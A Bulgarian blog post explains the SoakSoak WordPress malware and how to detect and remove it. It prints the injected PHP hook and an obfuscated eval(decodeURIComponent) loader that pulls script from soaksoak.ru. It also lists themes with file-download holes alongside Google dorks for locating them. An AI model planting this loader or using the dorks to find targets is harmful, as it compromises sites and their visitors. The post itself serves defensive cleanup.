Предпазване от SoakSoak уязвимост на вашия WordPress сайт

Предпазване от SoakSoak уязвимост на вашия WordPress сайт

Над 11000 уебсайта използващи най-популярната CMS платформа – Wordpress бяха блеклистнати от Google след като бяха инфектирани от SoakSoak malware. Компанията за онлайн сигурност Sucuri първа съобщи за тази уязвимост и предупреди, че този вид malware може да доведе до много по-сериозен проблем от заразяването на няколко хиляди уебсайта. Нашият FriendlyGeeks екип ще ви покаже как да изчистите сайта си от този malware!

Какво представлява SoakSoak?

SoakSoak е malware, който модифицира файловете във вашата WordPress инсталация, след което зарежда Javascript и съдържание от домейн името soaksoak.ru, по-специално този файл - hxxp://soaksoak.ru/xteas/code. SoakSoak използва уязвимост в RevSlider WordPress плъгина и за първи път е забелязан през септември. RevSlider е премиум плъгин и всъщност е част от много WordPress теми, така че голяма част от собствениците на уебсайтове, базирани върху CMS системата въобще не подозират, че използват този плъгин. Като резултат от това, те не го и обновяват.

SoakSoak извършва промени в следния файл: wp-includes/template-loader.php и включва следното съдържание във файла:

<?php

function FuncQueueObject()

{

wp_enqueue_script("swfobject");

}

add_action("wp_enqueue_scripts", 'FuncQueueObject');

Това води до зареждане на wp-includes/js/swfobject.js на всяка страница на сайта ви и включва malware по следния начин:

eval(decodeURIComponent ("%28%0D%0A%66%75%6E%63%74%69%6F%6E%28%29%0D%0A%7B%0D%..72%69%70%74%2E%69%64%3D%27%78%78%79%79%7A%7A%5F%70%65%74%75%73%68%6F%6B%27%3B%0D%0A%09%68%65%61%64%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%73%63%72%69%70%74%29%3B%0D%0A%7D%28%29%0D%0A%29%3B"));

Как да тествам дали сайтът ми е заразен с SoakSoak?

Ако имате опасения, че вашия сайт е заразен, можете да го тествате напълно безплатно с Free SiteCheck scanner.


Как да изчистя сайта си?

Ако вашия уебсайт е инфектиран, можете да предприемете следните действия:

  • да изчистите следните файлове:

template-loader.php
swfobject.js
hostdata133.php,

като изтриете следния стринг от тях:

eval(decodeURIComponent  ("%28%0D%0A%66%75%6E%63%74%69%6F%6E%28%29%0D%0A%7B%0D%..72%69%70%74%2E%69%64%3D%27%78%78%79%79%7A%7A%5F%70%65%74%75%73%68%6F%6B%27%3B%0D%0A%09%68%65%61%64%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%73%63%72%69%70%74%29%3B%0D%0A%7D%28%29%0D%0A%29%3B"));
  • да обновите RevSlider плъгина;
  • да обновите WordPress,темите и всички плъгини, които използвате.

По-долу можете да видите списък с теми, които най-вероятно са заразени със SoakSoak:

# WordPress IncredibleWP Theme Arbitrary File Download

# Vendor Homepage: http://freelancewp.com/wordpress-theme/incredible-wp/

# Google Dork: "Index of" +/wp-content/themes/IncredibleWP/



# WordPress Ultimatum Theme Arbitrary File Download

# Vendor Homepage: http://ultimatumtheme.com/ultimatum-themes/s

# Google Dork: "Index of" +/wp-content/themes/ultimatum



# WordPress Medicate Theme Arbitrary File Download

# Vendor Homepage: http://themeforest.net/item/medicate-responsive-medical-and-health-theme/3707916

# Google Dork: "Index of" +/wp-content/themes/medicate/



# WordPress Centum Theme Arbitrary File Download

# Vendor Homepage: http://themeforest.net/item/centum-responsive-wordpress-theme/3216603

# Google Dork: "Index of" +/wp-content/themes/Centum/



# WordPress Avada Theme Arbitrary File Download

# Vendor Homepage: http://themeforest.net/item/avada-responsive-multipurpose-theme/2833226

# Google Dork: "Index of" +/wp-content/themes/Avada/



# WordPress Striking Theme & E-Commerce Arbitrary File Download

# Vendor Homepage: http://themeforest.net/item/striking-multiflex-ecommerce-responsive-wp-theme/128763

# Google Dork: "Index of" +/wp-content/themes/striking_r/



# WordPress Beach Apollo Arbitrary File Download

# Vendor Homepage: https://www.authenticthemes.com/theme/apollo/

# Google Dork: "Index of" +/wp-content/themes/beach_apollo/

Етикети: #malware #bag #wordpress #soaksoak #predpazvane-na-sajta #revslider-plagin #infektiran-wordpress #zarazeni-sas-soaksoak